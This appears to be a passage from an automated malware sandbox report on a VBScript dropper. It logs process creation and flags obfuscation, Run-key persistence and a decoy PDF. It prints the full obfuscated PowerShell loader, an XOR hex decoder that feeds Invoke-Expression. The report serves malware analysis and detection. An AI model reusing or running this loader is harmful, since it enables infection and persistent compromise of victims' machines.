'1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\AdobeError.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c dir&echo ###RSHELL.EXE### Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D060 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\AdobeError.pdf Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqjofbd2.d2y.ps1 Jump to behavior
Source: classification engine Classification label: mal84.troj.evad.winVBS@34/67@5/5
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-X1WV4F
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\002671299.vbs"
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 002671299.vbs Static file information: File size 1720468 > 1048576

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("poweRSHELL.EXE", ""$Misjoinam = """ FSu nOc tCiPo nR AI n", "Unsupported parameter type 00000000", "Unsupported parameter type 00000000", "0")
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Billiggr160 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Billiggr160 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
